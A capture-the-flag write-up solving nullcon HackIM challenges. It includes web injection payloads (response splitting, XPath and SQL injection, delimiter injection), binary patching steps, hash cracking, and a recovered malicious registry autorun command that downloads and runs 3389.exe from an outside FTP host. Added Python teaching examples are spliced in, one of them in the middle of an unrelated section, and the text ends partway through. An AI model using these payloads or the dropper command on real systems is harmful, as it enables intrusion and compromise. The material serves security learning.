      print "Original: " + orig[i].unpack("B*").first + "\n"
      binmsg = binmsg + crypted[i].unpack("B*").first[7]   # least significant bit of each ciphertext byte
    end
    print "Binary message: " + binmsg + "\n"
    print "Text message: " + [binmsg].pack("B*")          # 8 collected bits = 1 character of the hidden message
    print "\n"

Flag: Learn howto Hide in Plain Sight

Programming Level 1: ROTOMATA

Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm nso nntjj, phf swvawwhnwer, pcum nu oeq ewllxqmqit

Clue: We only know the first 6 characters: "Men at"

Approach: From manual inspection, we found that possibly the ith character in the ciphertext differs from the plaintext by i mod 26. By manually decoding some words and Google searching, got the flag.

Flag: Men at some time are masters of their fates: The fault, dear Brutus, is not in our stars, but in ourselves, that we are underlings

Programming Level 2: Pascal's Triangle

The flag is the sum of all middle terms of the first 1337 rows of Pascal's triangle.

Approach: In Pascal's triangle, the sum of the squares of the elements of row n equals the middle element of row (2n - 1).

Ruby code:

    #rows = gets
    rows = 1337
    rows = rows.to_i / 2
    a = Array.new
    total = 0
    (0..rows).each do |i|
      a[i] = Array.new
      (0..i).each do |j|
        a[i][j] = 1 if j == 0 || i == j
        a[i][j] = a[i - 1][j - 1] + a[i - 1][j] unless j == 0 || i == j
        total = total + a[i][j] * a[i][j]
      end
    end
    print total
    print "\n"

Flag: 43659324741884237070936006832303643114239411987772786602066543431205872166674362332393596312576719064242547970040323267566530343333103970820072593578706234276624324605878186670972267056459871456566594569343564988621600326286475080697865518622537377534356455651048425097523734881838663157063304671110082383218294453737678744221560158357896856330703194356882895482874383651576271102847866170999680296497

Programming Level 3: Your Brainfuck Sir...

Debug bfcode to get the flag.

File: http://www.nullcon.net/challenge/data/bfcode

Approach: Used an online BF interpreter and debugger. Adding . at the end of every line gave the required flag as output.

Flag: ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs after you..

Programming Level 4: Substitute Problem

File: http://www.nullcon.net/challenge/data/deobfus

Ruby code:

    # trans1: each two-digit number is an index into the cipher alphabet
    # (0 = space, 1..26 = A..Z, then three dots, then 30..39 = 0..9)
    def trans1(x)
      out = ""
      cipher = " ABCDEFGHIJKLMNOPQRSTUVWXYZ...0123456789"
      words = x.split
      words.each do |w|
        out = out + cipher[w.to_i]
      end
      return out
    end

    # trans2: each spelled-out number word becomes its two-digit value
    # (the misspellings FOUTEEN and EIGTEEN are the challenge's own and must be kept)
    def trans2(x)
      out = ""
      map = {
        "ZERO" => "00", "ONE" => "01", "TWO" => "02", "THREE" => "03", "FOUR" => "04",
        "FIVE" => "05", "SIX" => "06", "SEVEN" => "07", "EIGHT" => "08", "NINE" => "09",
        "TEN" => "10", "ELEVEN" => "11", "TWELVE" => "12", "THIRTEEN" => "13", "FOUTEEN" => "14",
        "FIFTEEN" => "15", "SIXTEEN" => "16", "SEVENTEEN" => "17", "EIGTEEN" => "18", "NINETEEN" => "19",
        "TWENTY" => "20", "TWENTYONE" => "21", "TWENTYTWO" => "22", "TWENTYTHREE" => "23", "TWENTYFOUR" => "24",
        "TWENTYFIVE" => "25", "TWENTYSIX" => "26", "THIRTYEIGHT" => "38", "THIRTYFOUR" => "34"
      }
      words = x.split
      words.each do |w|
        print "Invalid " + w if map[w].nil?
        out = out + map[w].to_s + " "
      end
      return out
    end

    input = gets
    out = trans1(input)
    print out.downcase + "\n"
    out = trans2(out)
    print out.downcase + "\n"
    out = trans1(out)
    print out.downcase + "\n"
    out = trans2(out)
    print out.downcase + "\n"
    out = trans1(out)
    print out.downcase + "\n"
    #out = trans1(trans2(trans1(trans2(trans1(input)))))
    #print out.downcase + "\n"

    [plevel4]$ cat deobfus | ruby deof.rb
    fouteen nine fouteen five twenty five five fouteen zero six nine twentytwo five zero six fifteen twentyone eigteen zero twenty twentythree five fouteen twenty twentyfive fifteen fouteen five zero twenty twentythree five twelve twentytwo five zero six nine six twenty five five fouteen zero twenty twentythree five fouteen twenty twentyfive fifteen fouteen five zero fouteen nine fouteen five twenty five five fouteen zero twenty twentythree five twelve twentytwo five zero twenty twentythree five fouteen twenty twentyfive six nine twentytwo five zero twentysix five eigteen fifteen zero six nine twentytwo five zero fouteen nine fouteen five twenty five five fouteen zero twenty eight eigteen five five zero five nine seven eight twenty zero six nine twentytwo five zero twenty twentythree five fouteen twenty twentyfive twenty eight eigteen five five zero twentysix five eigteen fifteen zero six nine six twenty five five fouteen zero twenty twentythree fifteen zero nineteen nine twentyfour zero twenty twentythree five fouteen twenty twentyfive fifteen fouteen five zero fouteen nine fouteen five twenty five five fouteen zero twenty eight eigteen five five zero fifteen fouteen five zero twenty twentythree five fouteen twenty twentyfive zero six nine six twenty five five fouteen zero five nine seven twenty five five fouteen zero twenty twentythree five fouteen twenty twentyfive six nine twentytwo five zero twentysix five eigteen fifteen zero five nine seven eight twenty zero twenty twentythree five fouteen twenty twentyfive six nine twentytwo five zero nineteen nine twentyfour twenty five five fouteen zero six nine twentytwo five zero five nine seven twenty five five fouteen zero twenty twentythree five fouteen twenty twentyfive twenty twentythree fifteen zero six nine twentytwo five zero five nine seven twenty five five fouteen zero twenty twentythree fifteen zero six nine six twenty five five fouteen zero fouteen nine fouteen five twenty five five fouteen zero fouteen nine fouteen five zero twenty twentythree five fouteen twenty twentyfive zero twenty twentythree five fouteen twenty twentyfive six nine twentytwo five zero twentysix five eigteen fifteen zero fifteen fouteen five zero six fifteen twentyone twenty five five fouteen zero six fifteen twentyone eigteen zero twentysix five eigteen fifteen zero nineteen nine twentyfour twenty five five fouteen zero five nine seven twenty five five fouteen zero six nine six twenty five five fouteen zero twenty twentythree five twelve twentytwo five zero fouteen nine fouteen five zero twenty twentythree five fouteen twenty twentyfive six fifteen twentyone eigteen zero fouteen nine fouteen five zero twenty twentythree five fouteen twenty twentyfive zero twenty twentythree five fouteen twenty twentyfive six nine twentytwo five zero twentysix five eigteen fifteen zero twenty eight nine eigteen twenty twentyfive five nine seven eight twenty zero twenty eight nine eigteen twenty twentyfive six fifteen twentyone eigteen zero twentysix five eigteen fifteen zero five nine seven twenty five five fouteen zero six nine six twenty five five fouteen zero six nine twentytwo five zero six fifteen twentyone eigteen zero twenty twentythree five fouteen twenty twentyfive six nine twentytwo five zero twentysix five eigteen fifteen zero nineteen five twentytwo five fouteen zero five nine seven twenty five five fouteen zero six nine twentytwo five zero six nine twentytwo five zero six fifteen twentyone twenty five five fouteen
    14 09 14 05 20 05 05 14 00 06 09 22 05 00 06 15 21 18 00 20 23 05 14 20 25 15 14 05 00 20 23 05 12 22 05 00 06 09 06 20 05 05 14 00 20 23 05 14 20 25 15 14 05 00 14 09 14 05 20 05 05 14 00 20 23 05 12 22 05 00 20 23 05 14 20 25 06 09 22 05 00 26 05 18 15 00 06 09 22 05 00 14 09 14 05 20 05 05 14 00 20 08 18 05 05 00 05 09 07 08 20 00 06 09 22 05 00 20 23 05 14 20 25 20 08 18 05 05 00 26 05 18 15 00 06 09 06 20 05 05 14 00 20 23 15 00 19 09 24 00 20 23 05 14 20 25 15 14 05 00 14 09 14 05 20 05 05 14 00 20 08 18 05 05 00 15 14 05 00 20 23 05 14 20 25 00 06 09 06 20 05 05 14 00 05 09 07 20 05 05 14 00 20 23 05 14 20 25 06 09 22 05 00 26 05 18 15 00 05 09 07 08 20 00 20 23 05 14 20 25 06 09 22 05 00 19 09 24 20 05 05 14 00 06 09 22 05 00 05 09 07 20 05 05 14 00 20 23 05 14 20 25 20 23 15 00 06 09 22 05 00 05 09 07 20 05 05 14 00 20 23 15 00 06 09 06 20 05 05 14 00 14 09 14 05 20 05 05 14 00 14 09 14 05 00 20 23 05 14 20 25 00 20 23 05 14 20 25 06 09 22 05 00 26 05 18 15 00 15 14 05 00 06 15 21 20 05 05 14 00 06 15 21 18 00 26 05 18 15 00 19 09 24 20 05 05 14 00 05 09 07 20 05 05 14 00 06 09 06 20 05 05 14 00 20 23 05 12 22 05 00 14 09 14 05 00 20 23 05 14 20 25 06 15 21 18 00 14 09 14 05 00 20 23 05 14 20 25 00 20 23 05 14 20 25 06 09 22 05 00 26 05 18 15 00 20 08 09 18 20 25 05 09 07 08 20 00 20 08 09 18 20 25 06 15 21 18 00 26 05 18 15 00 05 09 07 20 05 05 14 00 06 09 06 20 05 05 14 00 06 09 22 05 00 06 15 21 18 00 20 23 05 14 20 25 06 09 22 05 00 26 05 18 15 00 19 05 22 05 14 00 05 09 07 20 05 05 14 00 06 09 22 05 00 06 09 22 05 00 06 15 21 20 05 05 14
    nineteen five four twentyone twelve fifteen twentyone nineteen twelve twentyfive zero five nineteen three eight five twentythree zero fifteen two six twentyone nineteen three one twenty fifteen eigteen twentyfive zero eight twentyfive sixteen five eigteen twentytwo five eigteen two fifteen nineteen nine twenty twentyfive zero one fouteen four zero sixteen eigteen fifteen twelve nine twentyfour nine twenty twentyfive zero thirtyeight thirtyfour zero eigteen fifteen five four twentyfive zero seven eigteen five five fouteen
    19 05 04 21 12 15 21 19 12 25 00 05 19 03 08 05 23 00 15 02 06 21 19 03 01 20 15 18 25 00 08 25 16 05 18 22 05 18 02 15 19 09 20 25 00 01 14 04 00 16 18 15 12 09 24 09 20 25 00 38 34 00 18 15 05 04 25 00 07 18 05 05 14
    sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green

Flag: sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green

Programming Level 5: A pinch of salt for your coffee, Sir?

URL: http://www.nullcon.net/challenge/plevel-5-salt.asp

Clue: password + salt = md5 hash

Approach: Obtained the md5 hash for password = 'a' as 5e33d53d1a9511b8ddccc3c1aed830de. Created pass.txt with the following content:

    a: 5e33d53d1a9511b8ddccc3c1aed830de

Brute-forced it using john (version 1.7.9-jumbo) in incremental mode:

    john -i --format=raw-md5 pass.txt
    Loaded 1 password hash (Raw MD5 [SSE2i 10x4x3])
    a399a7d          (a)

Password cracked: a399a7d, i.e. the known password 'a' followed by the salt.

Flag: 399a7d

Web Level 1: Can you view the bytes in password.asp from Me?

URL: http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=test.txt

Tools Used: Google Chrome

Approach: Null byte termination file disclosure vulnerability.
  1. Right click on the link Me and select Inspect Element.
  2. Edit the attribute href from "wlevel-1-proc.asp?input=test.txt" to "wlevel-1-proc.asp?input=password.asp%00.txt".
  3. Click on Me.

Flag: password.asp%00.txt

Web Level 2: Can you redirect ME to hackim.null.co.in?
Tools Used: Google Chrome
Approach: HTTP Response Splitting
Steps:
1. Right click on the link ME and select Inspect Element
2. Edit the href attribute from "wlevel-2-proc.asp?page=index.asp" to "wlevel-2-proc.asp?page=wlevel-2-proc.asp?page=index.asp%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20302%20OK%0d%0aLocation:%20hackim.null.co.in"
3. Click on ME
References: http://projects.webappsec.org/w/page/13246931/HTTP%20Response%20Splitting

Web Level 3: Login System
Clue:
<!--Debug Info: INSERT a99|a|a99|a@a99.com|admin:no|comment:new user INTO USER DB FILE -->
Approach: During registration, the data is stored in the DB as the above query. To bypass, register a user with the email user@example.com|admin:yes
On logging in with the user registered above, we get the following:
Welcome! You are logged in as ADMIN!
Flag: b3149ecea4628efd23d2f86e5a723472

Web Level 4: Can You Get Me all the Data?
Approach: Looked like SQL injection at first, as http://www.nullcon.net/challenge/wlevel-4-data.asp?input=or= gave all the data. On IRC, someone mentioned that he had been told that SQL injection is a waste of time for this level. So guessed this should be either XQuery or XPath injection. Followed the steps suggested in the Blind XPath Injection paper by Amit Klein.
input =or(name(//president[1])="president")ora=b => true => "president" exists in namespace
input =or(name(//president[1])="people")ora=b => false => "people" does not exist in namespace
input =or(name(//president[1])="india")ora=b => true => "india" exists in namespace
input =or(name(//name[1])="name")ora=b => true => "name" exists in namespace
From the above, crafted the following query:
] | //president[or=
Other query that also worked:
] | //india[or=
Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear
References:
1. http://hackbbs.org/article/book/wf/blind-xpath-injection.pdf
2. http://projects.webappsec.org/XPath-Injection

Web Level 5: Do You Have What IT Takes to Break into the Worlds Most Secure Login System?
Approach: Certain SQL injections are checked for and blocked by the login system. Initially thought the flaw may be in the logging system, so tried spoofing the User-Agent without much success. Heard on IRC that this level is SQLi. Found that the system does not block comments (/**/). Also the login password field is limited to 10 characters, but only by a client-side limitation, which can be overcome using Inspect Element and Edit attribute in Google Chrome. Tried a lot of different SQLi. Finally the one which succeeded is:
Username: UNION/**/SELECT/**/1,admin,doesntmatter
Password: doesntmatter
Welcome! You are logged in as ADMIN!
Flag: 47c1b025fa18ea96c33fbb6718688c0f

Reverse Engineering Level 1: Basic Test
Binary URL: http://www.nullcon.net/challenge/data/justdoit.exe
Approach: From the resource section, we find that it is a piece of software called AutoHotkey. When it is running, if you press Windows + R, it automatically types into the Open field (I am using Vista). Opened Notepad, started justdoit.exe, pressed Windows + R and then quickly clicked on the open Notepad. The keystrokes went into Notepad and the flag was typed.
Flag: We could talk all day about what AutoHotKey can do for an online poker player

Reverse Engineering Level 2: Ask nicely, it will give you what you want
Binary URL: http://www.nullcon.net/challenge/data/HackIM.exe
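Going back to Web Level 3: the pipe-delimited record from the debug comment, first in the concatenating form that the admin:yes bypass relies on and then hardened, as an added example in Python (not code from the writeup or from the challenge). The field order, the positional parse and the validation rules are assumptions made for this illustration; the bypass value is the one the writeup used.

```python
import re

# Added example, not from the writeup. The Web Level 3 debug comment shows the
# record a registration writes: user|pass|name|email|admin:no|comment:new user.
# Field order, the positional parse and the validation rules are assumptions
# made for this illustration; the bypass value is the one the writeup used.
RECORD_FIELDS = ("user", "pass", "name", "email", "admin", "comment")
ADMIN_INDEX = RECORD_FIELDS.index("admin")
BYPASS_EMAIL = "user@example.com|admin:yes"

# Deliberately simple address check: one local part, one domain, and no
# record delimiter, whitespace or second '@' anywhere in it.
EMAIL_RE = re.compile(r"^[^|\s@]+@[^|\s@]+\.[A-Za-z]{2,}$")


class InvalidField(ValueError):
    """Raised by the hardened paths when a field would corrupt the record."""


def vulnerable_register(user, password, name, email):
    """Concatenate fields with '|' as the debug comment suggests the app does.
    The password is stored as given, as in the clue (hashing is out of scope)."""
    return "|".join([user, password, name, email, "admin:no", "comment:new user"])


def vulnerable_login_role(record):
    """Positional parse: an extra '|' in the email shifts 'admin:yes' into the
    admin slot and pushes the genuine 'admin:no' one slot to the right."""
    fields = record.split("|")
    return "admin" if fields[ADMIN_INDEX] == "admin:yes" else "user"


def hardened_register(user, password, name, email):
    """Reject any user-supplied field that contains the record delimiter or a
    line break, and validate the email shape, before the record is built."""
    for label, value in (("user", user), ("pass", password), ("name", name)):
        if not value or "|" in value or "\n" in value or "\r" in value:
            raise InvalidField(f"{label}: empty or contains a record delimiter")
    if not EMAIL_RE.fullmatch(email):
        raise InvalidField("email: not a single well-formed address")
    return "|".join([user, password, name, email, "admin:no", "comment:new user"])


def hardened_login_role(record):
    """Defence in depth at read time: a record with the wrong number of fields
    was tampered with (or written by the old code) and must not grant a role."""
    fields = record.split("|")
    if len(fields) != len(RECORD_FIELDS):
        raise InvalidField("record has %d fields, expected %d"
                           % (len(fields), len(RECORD_FIELDS)))
    return "admin" if fields[ADMIN_INDEX] == "admin:yes" else "user"


def demo():
    """Returns (role the vulnerable app grants, what the hardened app does)."""
    record = vulnerable_register("a99", "a", "a99", BYPASS_EMAIL)
    before = vulnerable_login_role(record)           # "admin"
    try:
        hardened_register("a99", "a", "a99", BYPASS_EMAIL)
        after = "registered"
    except InvalidField:
        after = "rejected"
    return before, after


if __name__ == "__main__":
    print(demo())
```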
Hint: Look for other paths.
Approach: Tried a lot of things with OllyDBG. Tried changing the entry point with Set Origin in Olly without any luck. The code may be in the .rsrc segment, which is not executable.
Opened the PE exe file using Stud_PE (http://www.cgsoftlabs.ro/studpe.html)
Changed the entry point to 0xC000, set the permissions of the .rsrc segment to Read, Write and Execute, and ran HackIM.exe
Flag: AreYouHappyNow?

Reverse Engineering Level 3: null Mobile Android App
URL: http://www.nullcon.net/challenge/data/Null%20Mobile.apk
Approach: Extracted the apk file by renaming it to NullMobile.apk.zip and opening it in WinRAR.
Found obfuscated JavaScript (an eval-wrapped function(p,a,c,k,e,r) packer) in code.js and junk.php under res/raw.
Beautify using: http://jsbeautifier.org/
The flag is within the deobfuscated JavaScript code.
...
function mikcah(a, b) {
    galf = "Do not let what you cannot do interfere with what you can do."
}
...
Flag: Do not let what you cannot do interfere with what you can do.

Reverse Engineering 4
Binary URL: http://www.nullcon.net/challenge/data/script2
Tools: objdump, vi, gdb, strings, ps, cat
Steps:
Disassemble using objdump (objdump -d ./script2)
Locate the call to time:
  400ff3:  bf 00 00 00 00    mov    $0x0,%edi
  400ff8:  e8 43 f9 ff ff    callq  400940 <time@plt>
  400ffd:  48 39 c3          cmp    %rax,%rbx
  401000:  7d 0a             jge    40100c
Change the above jge to jl (i.e. change 7d 0a to 7c 0a) at offset 0x00001000 using vi in hex editor mode (open the binary file in vi, type :%!xxd to convert to the hex view format, modify, type :%!xxd -r to revert back to binary, then save and exit with :wq).
Run ./script2 and press CTRL+Z to put it in the background.
Find the process using ps.
See /proc/<pid>/cmdline.
Found the following being executed:

#!/bin/sh
##########################################################################
# Title    : icat - "intelligent" cat
# Author   : Heiner Steven <heiner.steven@odn.de>
# Date     : 1994-05-18
# Requires : gzip, zcat
# Category : File Utilities
# SCCS-Id. : @(#) icat 1.3 08/01/31
##########################################################################
# Description
##########################################################################

PN=`basename "$0"`                      # program name
VER=1.3

Extensions=".Z .z .gz .cpz .tgz"        # known file extensions

usage () {
    echo >&2 "$PN - cat file, uncompress if necessary, $VER (stv 95)
usage: $PN -l
       $PN [file ...]

The first case lists all known extensions, the other case tries
to print the given file, uncompressing it if necessary."
    exit 1
}

msg () {
    for line
    do echo "$PN: $line" >&2
    done
}

fatal () { msg "$@"; exit 1; }

while [ $# -gt 0 ]
do
    case "$1" in
        -l)     # List known suffixes
                echo $Extensions
                exit 0;;
        --)     shift; break;;          # Simulate getopt
        -h)     usage;;
        *)      break;;
    esac
done

if [ $# -lt 1 ]
then    # read from stdin (uncompressed)
    cat
else
    flagreq=0
    if [ $flagreq -eq 1 ]
    then
        echo "Nature has neither kernel nor shell; she is everything at once"
    fi
    for file
    do
        if [ -r "$file" ]       # file does exist
        then
            # Try to determine decompressor based on the extension
            case "$file" in
                *.Z)            zcat "$file";;
                *.z)            gzip -d -c "$file";;
                *.gz|*.tgz)     gzip -d -c "$file";;
                *.bz2)          bzip2 -d -c "$file";;
                *.cpz)          zcat < "$file";;
                *)              cat "$file";;
            esac
        else
            # File does not exist: try to determine compressed version
            if [ -r "$file".bz2 ]
            then bzip2 -d -c "$file"
            elif [ -r "$file".gz ]
            then gzip -d -c "$file"
            elif [ -r "$file".tgz ]
            then gzip -d -c "$file"
            elif [ -r "$file".Z ]
            then zcat "$file"
            elif [ -r "$file".z ]
            then gzip -d -c "$file"
            elif [ -r "$file".cpz ]
            then zcat < "$file"
            else fatal "could not find file: $file"
            fi
            Err=$?
        fi
    done
fi

Alternate way:
1. Set the core size limit to unlimited (ulimit -c unlimited), send SIGSEGV to the program and force it to dump core. You can find the script by running strings on the core.
2. Hook the call to time using the LD_PRELOAD technique.
Flag: Nature has neither kernel nor shell; she is everything at once

Reverse Engineering Level 5: Got Dumped :(
URL: http://www.nullcon.net/challenge/data/lol.rar
Tools Used: WinDBG, OllyDBG, metasm, vi
Steps:
The file is a crash dump file. Opened the file in WinDBG and ran !analyze -v. The program crashed in

Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
Copyright (c) Microsoft Corporation. All rights reserved.

Loading Dump File [D:\Users\Nilanjan\Documents\Docs\nullcon\lol.dmp]
User Mini Dump File with Full Memory: Only application data is available

Symbol search path is: srv*c:\symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows XP Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
Machine Name:
Debug session time: Sun Jan 8 14:38:14.000 2012 (GMT+5)
System Uptime: 0 days 0:57:47.904
Process Uptime: 0 days 0:00:21.000
.....
This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(a60.73c): Access violation - code c0000005 (first/second chance not available)
eax=0000978f ebx=00000001 ecx=a1840000 edx=82839b00 esi=00000000 edi=fffffffe
eip=deadbabe esp=0012feec ebp=0012ff30 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
deadbabe ??
0:000> lm
start    end        module name
00400000 0040e000   Stub       (no symbols)
77f10000 77f59000   gdi32      (pdb symbols)  c:\symbols\gdi32.pdb\740F60A99F2A417E96C387400994588D2\gdi32.pdb
7c800000 7c8f6000   kernel32   (pdb symbols)  c:\symbols\kernel32.pdb\34560E80F5C54175B208848EF863C5BD2\kernel32.pdb
7c900000 7c9af000   ntdll      (pdb symbols)  c:\symbols\ntdll.pdb\1751003260CA42598C0FB326585000ED2\ntdll.pdb
7e410000 7e4a1000   user32     (pdb symbols)  c:\symbols\user32.pdb\D18A41B74E7F458CAAAC1847E2D8BF022\user32.pdb

Wrote the memory to a file as a mapped PE binary file.
0: 000> .writemem Stub.bin 00400000 0040dfff
Writing e000 bytes............................
Converted it to a proper PE file using metasm:
#No | Name   | VSize    | VOffset  | RSize    | ROffset  | Charact.
#01 | .text  | 00006254 | 00001000 | 00006400 | 00000400 | 60000020
#02 | .rdata | 00001B42 | 00008000 | 00001C00 | 00006800 | 40000040
#03 | .data  | 000018DC | 0000A000 | 00000E00 | 00008400 | C0000040
#04 | .rsrc  | 000001B4 | 0000C000 | 00000200 | 00009200 | 40000040
#05 | .reloc | 00000C4E | 0000D000 | 00000E00 | 00009400 | 42000040

require './metasm/metasm'
# read the raw image written by .writemem
data = File.open("Stub.bin", "rb") { |fd| fd.read(fd.stat.size) }
pe = Metasm::LoadedPE.load(data)
pe.cpu = Metasm::Ia32.new
pe.encode_file("Stub.exe", "exe")

Tried debugging using OllyDBG. The code has anti-debugger checks because of which most paths did not work. Tried changing entry points but none worked. Located the call to MessageBox. Manually checked where it gets called from. The WinDBG analysis showed that the program crashed while trying to execute code @0xdeadbabe. Found a push 0xdeadbabe followed by retn, which is an indirect way of calling 0xdeadbabe.
0040106C   68 BEBAADDE    PUSH DEADBABE
00401071 . C3             RETN
Changed the address to just before the MessageBox call code.
0040106C . 68 DA104000    PUSH stub3.004010DA
00401071 . C3             RETN                 ; RET used as a jump to 004010DA
Open the program using OllyDbg. Select the following and set it as the new origin:
00401000 $ 55             PUSH EBP
Run the code.
Flag: TheLastSamurai
Forensics Level 1: Tum Agar Dhyan Se Baat Meri Suno
While conducting the raid on a suspect, the police found the system containing no suspicious information in the form of a code. While comparing various files they came up with a suspicious sound file and feel that the code is hidden inside the same.
You are asked to find out that code if hidden in the file.
Evidence URL: http://www.nullcon.net/challenge/data/JS.rar
Tools used: audacity
Approach: Open with audacity and analyse.
At some offsets, we find that the channel data differ. Extract only the portions where there is hidden audio in the right channel.
Playing it sounds like some numbers in a foreign language.
If we apply the Reverse effect, mute the left channel and play, we can hear English numbers.
Flag: 12344346765

Forensics Level 2: Andar Ch0r
A company, Mil Baat Ke Khao Ltd, suspects that one of its employees is sending the internal codes secretly outside the organisation. The company sniffed the data being sent and reconstructed it to find that a Word document was being sent.
The company strongly suspects that there is some hidden passport code in the document.
You as a forensic investigator are provided with the copy of that file and are required to find out the hidden code. The code has to be a whole number.
Evidence URL: http://www.nullcon.net/challenge/data/Passport_Number.doc
Running strings on the file shows that there are hidden worksheets. Renamed it to Password.xls and the file opened properly in Excel.
Unhide the hidden sheets. The Nullcon2 sheet becomes visible.
Open the VB editor, select Sheet3 (Nullcon3) and press F4 to view its properties. Change the Visible property of the Nullcon3 sheet from 2 - xlSheetVeryHidden to -1 - xlSheetVisible.
Here is your Passport number to the new level 6924289
Flag: 6924289

Forensics Level 3: Not Guilty!
An employee was suspected of using some malicious files. The employee asserts that he is not guilty because he never used any program except Microsoft Word and Excel.
While conducting the analysis nothing was found in the registry suggesting that something did run automatically. All locations that can run programs automatically were examined and nothing malicious was found.
You as an investigator are provided with a piece of hive to carve out if anything was deleted from the hive and provide the exact "Value", "value type" and "data" deleted so that the employee gets the justice.
Approach: Tried with RegRipper and yaru. Worked with reglookup-recover (http://projects.sentinelchicken.org/reglookup/)
$>reglookup-recover.exe software
OFFSET,REC_LENGTH,REC_TYPE,PATH,NAME,NK_MTIME,NK_NVAL,VK_TYPE,VK_VALUE,VK_DATA_LEN,SK_OWNER,SK_GROUP,SK_SACL,SK_DACL,RAW_CELL
ERROR: Bad cell length encountered while parsing unallocated cells at offset 0x00A27908.
00B4EEA0,00000020,VALUE,,Shell,,,SZ,c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q,490,,,,,
Text in unallocated segment: hidden registry key (a deleted Shell value).
Flag: c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q
References: http://www.digitalforensicssolutions.com/papers/recovering-and-analyzing-deleted-registry-hives.pdf

Forensics Level 4: Intriguing MBR
A suspected drive was found in bad shape. The data extraction was almost impossible and the final copy obtained carried only a few bytes. The bytes belonged to the initial sectors, and wherever the system could not read, the space was filled with 0x00 so as to keep the offset of the data obtained intact.
The initial sector displayed messy MBR data.
As a forensic investigator you are required to find the following information:
1) The number of partitions in the damaged drive
2) The start and end LBA for each partition
3) The start and end of unpartitioned space between two clusters
The drive showed to be a SATA drive with 512 bytes of LBA
Tools Used: mmls (Sleuthkit), vi
Approach:
Run mmls on the image.
[nullc0n]$ mmls -t gpt ./image.dd
Invalid magic value (GPT Header: 5452000020494600)
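What mmls is checking when it rejects the header, plus the partition and unallocated-range questions the level asks, as an added example in Python (not the writeup's code and not Sleuthkit's): it builds a small constructed GPT, validates the header, lists the used entries and the gaps between them, then zeroes the same signature bytes that produce the 5452000020494600 value above. Layout constants follow the UEFI specification; the disk size, partition names and GUIDs are constructed.

```python
import struct
import uuid
import zlib

# Added example, not from the writeup or from Sleuthkit. Layout constants follow
# the UEFI GPT specification; the disk below (sizes, names, GUIDs) is constructed.
SECTOR = 512                          # the level states 512-byte LBAs
HEADER_FMT = "<8sIIIIQQQQ16sQIII"     # 92-byte GPT header at LBA 1
ENTRY_FMT = "<16s16sQQQ72s"           # 128-byte partition entry
SIGNATURE = b"EFI PART"
ENTRY_COUNT = 128                     # entry count the writeup restores by hand
LINUX_FS = uuid.UUID("0FC63DAF-8483-4772-8E79-3D69D8477DE4")  # Linux filesystem data


def build_entries(partitions):
    """partitions: [(first_lba, last_lba, name)] -> packed entry array."""
    blob = b"".join(
        struct.pack(ENTRY_FMT, LINUX_FS.bytes_le, uuid.uuid4().bytes_le,
                    first, last, 0, name.encode("utf-16-le"))
        for first, last, name in partitions)
    return blob.ljust(ENTRY_COUNT * 128, b"\0")


def build_header(entries, total_sectors):
    """Primary header for LBA 1, with array CRC and header CRC filled in."""
    array_sectors = len(entries) // SECTOR
    f = [SIGNATURE, 0x00010000, 92, 0, 0,
         1, total_sectors - 1,                                  # MyLBA, AlternateLBA
         2 + array_sectors, total_sectors - 2 - array_sectors,  # usable LBA range
         uuid.uuid4().bytes_le, 2, ENTRY_COUNT, 128,
         zlib.crc32(entries) & 0xFFFFFFFF]
    f[3] = zlib.crc32(struct.pack(HEADER_FMT, *f)) & 0xFFFFFFFF  # CRC with field zeroed
    return struct.pack(HEADER_FMT, *f).ljust(SECTOR, b"\0")


def parse_header(sector):
    """Check LBA 1 the way a tool should: signature, header CRC, entry geometry.
    Returns (ok, problems, fields); never raises, so a damaged image stays inspectable."""
    f = list(struct.unpack(HEADER_FMT, sector[:92]))
    problems = []
    if f[0] != SIGNATURE:
        # mmls prints the signature as a little-endian integer; do the same
        problems.append("bad signature %016x" % struct.unpack("<Q", f[0])[0])
    stored, f[3] = f[3], 0
    if zlib.crc32(struct.pack(HEADER_FMT, *f)) & 0xFFFFFFFF != stored:
        problems.append("header crc mismatch")
    f[3] = stored
    if f[11] == 0 or f[12] != 128:
        problems.append("partition entry count/size invalid")
    return (not problems, problems, f)


def parse_entries(array, count):
    """Return (slot, first_lba, last_lba, name, type_guid) for used slots."""
    parts = []
    for slot in range(count):
        t, _u, first, last, _attrs, name = struct.unpack_from(ENTRY_FMT, array, slot * 128)
        if t == b"\0" * 16:
            continue                                   # unused slot
        parts.append((slot, first, last, name.decode("utf-16-le").rstrip("\0"),
                      str(uuid.UUID(bytes_le=t)).upper()))
    return parts


def unallocated_ranges(parts, first_usable, last_usable):
    """LBA ranges not covered by any entry (the level's third question)."""
    gaps, cursor = [], first_usable
    for _, first, last, _, _ in sorted(parts, key=lambda p: p[1]):
        if first > cursor:
            gaps.append((cursor, first - 1))
        cursor = max(cursor, last + 1)
    if cursor <= last_usable:
        gaps.append((cursor, last_usable))
    return gaps


def damage_like_page(sector):
    """Zero the bytes the damaged image had zeroed: 'E', 'P' and 'A' of the
    signature (giving 5452000020494600 when read as a little-endian integer)
    and the partition entry count, which the writeup repairs in vi."""
    s = bytearray(sector)
    for off in (0, 4, 5):
        s[off] = 0
    s[80:84] = b"\0\0\0\0"
    return bytes(s)


# Constructed disk: 1,000,000 sectors, two partitions with a gap between them.
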